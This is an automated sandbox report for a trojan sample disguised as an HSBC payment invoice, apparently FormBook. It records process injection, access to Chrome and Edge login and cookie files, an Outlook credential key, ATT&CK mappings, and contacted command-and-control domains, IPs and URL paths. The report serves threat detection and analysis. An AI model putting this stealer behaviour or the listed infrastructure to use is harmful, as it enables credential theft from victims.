            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EA886B cpuid | 0_2_00EA886B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_00EB50D7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EC2230 GetUserNameW, | 0_2_00EC2230
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 0_2_00EB418A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00E84AFE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_81
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_XP
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_XPe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_VISTA
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_7
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Binary or memory string: WIN_8
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 0_2_00EF6596
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_00EF6A5A
            MITRE ATT&CK Matrix (a number before a technique is the count of matched signatures mapped to it)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 31 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Software Packing | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 1 DLL Side-Loading | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 412 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Behavior Graph (ID: 1466744, Sample: HSBCscancopy-invoice778483-..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100)

            Start
              DNS/IP: www.hawalaz.xyz, www.yetung.com, 21 other IPs or domains
              Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
              www.hawalaz.xyz: Performs DNS queries to domains with low reputation
              - HSBCscancopy-invoice778483-payment87476MT103.exe (4), started
                Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                - svchost.exe, started
                  Signatures: Maps a DLL or memory area into another process
                  - UTbMqukHxZGmxEZNWddXnDURe.exe, injected
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    - rundll32.exe (13), started
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                      - UTbMqukHxZGmxEZNWddXnDURe.exe, injected
                        DNS/IP: www.hawalaz.xyz 162.0.213.72, ports 49720, 49721, 49722, ACPCA Canada; www.lavillitadepapa.com 74.208.46.171, ports 49756, 49757, 49758, ONEANDONE-ASBrauerstrasse48DE United States; 9 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      - firefox.exe, started

            Source | Detection | Scanner | Label
            HSBCscancopy-invoice778483-payment87476MT103.exe | 37% | ReversingLabs | Win32.Trojan.Strab
            HSBCscancopy-invoice778483-payment87476MT103.exe | 38% | Virustotal |
            HSBCscancopy-invoice778483-payment87476MT103.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner
            www.zt555.shop | 0% | Virustotal
            www.personalcaresale.shop | 0% | Virustotal
            www.oliviacorepilates.com | 0% | Virustotal
            www.zl1l5r.website | 1% | Virustotal
            www.hawalaz.xyz | 1% | Virustotal
            www.lavillitadepapa.com | 1% | Virustotal
            www.dribbean.website | 0% | Virustotal
            www.lecoinsa.net | 0% | Virustotal
            www.yetung.com | 3% | Virustotal
            www.778981.com | 3% | Virustotal
            marismotivates.com | 0% | Virustotal
            www.warcorpshs.com | 0% | Virustotal
            www.marismotivates.com | 1% | Virustotal
            www.gzlhysuess.com | 0% | Virustotal
            www.xn--vct91ch7lruy.com | 0% | Virustotal
            www.pista789.win | 2% | Virustotal
            www.66hc7.com | 0% | Virustotal
            SourceDetectionScannerLabelLink
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_51.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_65.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/zhishi/UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1gya.website/news/X59A.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_66.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.yuanjihua.vip/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://m.rmrwvg.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/shishang/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/common.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://news.wawlh.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/wow.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_34.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_56.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zloyow.website/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_37.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/swiper.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.livechat.com/chat-with/14282961/rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zl1l5r.website/post/1_50.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.livechat.com/?welcomerundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://beian.miit.gov.cnrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
162.0.213.72 | www.hawalaz.xyz | Canada | 35893 | ACPCA | true
217.116.0.191 | www.lecoinsa.net | Spain | 16371 | ACENS_ASSpainHostinghousingandVPNservicesES | false
118.99.50.8 | www.zt555.shop | Hong Kong | 38186 | FTG-AS-APForewinTelecomGroupLimitedISPatHK | false
162.209.189.210 | kloeti.pc205kopl.com | United States | 40065 | CNSERVERSUS | false
165.154.0.120 | 7a4ca695fd164z.greycdn.net | Canada | 7456 | INTERHOPCA | false
74.208.46.171 | www.lavillitadepapa.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
198.16.50.172 | www.zl1l5r.website | United States | 40065 | CNSERVERSUS | false
104.21.21.230 | www.personalcaresale.shop | United States | 13335 | CLOUDFLARENETUS | false
3.33.130.190 | marismotivates.com | United States | 8987 | AMAZONEXPANSIONGB | false
121.37.199.72 | yetung.com.lho0.faipod.com | China | 55990 | HWCSNETHuaweiCloudServicedatacenterCN | false
3.33.244.179 | www.oliviacorepilates.com | United States | 8987 | AMAZONEXPANSIONGB | false
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1466744
                  Start date and time:2024-07-03 10:49:20 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 26s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:HSBCscancopy-invoice778483-payment87476MT103.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/5@19/11
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 275
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target UTbMqukHxZGmxEZNWddXnDURe.exe, PID 832 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
--- | --- | ---
04:51:13 | API Interceptor | 10113719x Sleep call for process: rundll32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
162.0.213.72 | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | www.hawalaz.xyz/ercr/
162.0.213.72 | nJ8mJTmMf0.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | DHL Arrival Notice.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | www.devele.top/nm4d/
162.0.213.72 | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | www.hawalaz.xyz/ercr/
162.0.213.72 | Shipping Documents.exe | malicious | FormBook | www.beescy.xyz/pdwc/
162.0.213.72 | Shipping Documents.exe | malicious | FormBook | www.beescy.xyz/pdwc/
162.0.213.72 | Salary Raise.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | U prilogu lista novih narudzbi.exe | malicious | DBatLoader, FormBook | www.hawalaz.xyz/ercr/
162.0.213.72 | Salary List.exe | malicious | FormBook | www.adoby.xyz/ghq5/
217.116.0.191 | Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | www.lecoinsa.net/zd4t/
217.116.0.191 | D02984-KP-002011.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
217.116.0.191 | REQN#1010135038.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
217.116.0.191 | pismo1A 12.06.2024.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
217.116.0.191 | RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | www.lecoinsa.net/zd4t/
217.116.0.191 | CFV20240600121.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
217.116.0.191 | Nbvkrvfanxfmla.exe | malicious | DBatLoader, FormBook | www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
217.116.0.191 | fJXbhkbAh4.exe | malicious | FormBook, GuLoader | www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
217.116.0.191 | Image_0000384757.vbs | malicious | FormBook | www.metabolomicsrubio.com/nbys/?bj=s1S3SPgRNf7lMN0xl2vbADF7xYqfipWGAgii2Z+ocbhr7l7z1f11h4s+9phUKVtapv+G0obo8tHeZk2i1iFboqWmw/7EeLn68w==&kfh=KmQsQQxqanX
217.116.0.191 | order confirmation is attached.exe | malicious | DBatLoader, FormBook | www.captoriot.com/pn4e/?0hNpF=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&Ol53s=Ekys-3XKwc0kEr
162.209.189.210 | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | www.66hc7.com/ooz9/
162.209.189.210 | Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exe | malicious | FormBook | www.66hc7.com/ooz9/?0N=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&3x=xxOtBHK
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
www.personalcaresale.shop | nJ8mJTmMf0.exe | malicious | FormBook | 172.67.200.242
www.personalcaresale.shop | DHL Arrival Notice.exe | malicious | FormBook | 172.67.200.242
www.personalcaresale.shop | Salary Raise.exe | malicious | FormBook | 172.67.200.242
www.personalcaresale.shop | Salary List.exe | malicious | FormBook | 104.21.21.230
www.zl1l5r.website | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | 198.16.50.172
www.zl1l5r.website | PO Number 00127011.exe | malicious | FormBook | 198.16.50.172
www.zl1l5r.website | z28098882729202928.exe | malicious | DBatLoader, FormBook | 176.113.70.180
www.zl1l5r.website | 900524362267263.exe | malicious | FormBook | 176.113.70.180
www.zl1l5r.website | dokaz o uplati.exe | malicious | DBatLoader, FormBook | 176.113.70.180
www.zl1l5r.website | QUOTATION #U2013 RFQ 000535.exe | malicious | FormBook | 176.113.70.180
www.zl1l5r.website | COTA#U00c7#U00c3O #U2013 RFQ 000535.exe | malicious | FormBook | 176.113.70.180
www.zl1l5r.website | ftrrrttyt.exe | malicious | FormBook | 176.113.70.180
www.zl1l5r.website | RFQ2024563429876-9887877654.exe | malicious | FormBook | 176.113.70.180
www.oliviacorepilates.com | Shipping Documents.pdf.exe | malicious | FormBook | 3.33.244.179
www.oliviacorepilates.com | W5TnMyRi78vdxpf.exe | malicious | FormBook | 3.33.244.179
